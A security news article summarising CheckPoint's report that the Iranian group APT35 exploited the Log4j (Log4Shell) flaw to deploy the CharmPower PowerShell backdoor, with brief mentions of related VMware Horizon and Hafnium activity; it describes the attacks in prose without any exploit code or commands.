Iranian Hackers Exploit Log4j Vulnerability to Deploy PowerShell Backdoor
Reading Time: 2 minutes

Iranian hackers exploit the Log4j vulnerability to deploy a PowerShell backdoor dubbed as “CharmPower” for follow-on post-exploitation.

Researchers at CheckPoint in a report said, “The actor’s attack setup was obviously rushed, as they used the basic open-source tool for the exploitation and based their operations on the previous infrastructure, which made the attack easier to detect and attribute.” 

According to CheckPoint, the attacks are linked with APT35, a group also tracked using code names such as Charming Kitten, Phosphorus, and TA453 citing overlaps with toolsets previously identified as the infrastructure used by the threat actor.

Log4Shell or CVE-2021-44228 with a VVSS score: 10.0 is a critical security vulnerability in the popular Log4j logging library which can be exploited leading to remote execution of arbitrary code on compromised systems.

The widespread use of the Log4j library has created a vast pool of targets making it easy to exploit. Leading to bad actors seizing the opportunity to stage a dizzying array of attacks since its public disclosure last month.

Earlier Microsoft also pointed out APT35’s efforts to acquire and modify the Log4j exploit. The recent finding suggests the hacking group has worked around the flaw to distribute the PowerShell implant capable of retrieving next-stage modules and exfiltrating data to a command-and-control (C2) server.

Additionally, the CharmPower’s modules also support a variety of intelligence gathering functionality, including features to gather system information, list installed applications, take screenshots, enumerate running processes, execute commands sent from the C2 server, and clean up any signs of evidence created by these components.Iranian Hackers Exploit Log4j Vulnerability to Deploy PowerShell BackdoorMicrosoft and NHS earlier cautioned that internet-facing systems running VMware Horizon are being targeted to deploy web shells and a strain of ransomware called NightSky. Microsoft connected the latter to a China-based operator dubbed DEV-0401, which has also deployed LockFile, AtomSilo, and Rook ransomware in the past.

Microsoft in a blog post mentioned that Hafnium, another threat actor group operating out of China has also been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting

The researcher concluded, “Judging by their ability to take advantage of the Log4j vulnerability and by the code pieces of the CharmPower backdoor, the actors are able to change gears rapidly and actively develop different implementations for each stage of their attacks”

Related Articles:
Powerdir – New MacOS vulnerability can Lead to Unauthorized User Data Access
Abcbot Botnet Linked to Operators of Xanthe Crypto Mining Malware
Hacking Group Accidentally Infects itself with Remote Access Trojan Horse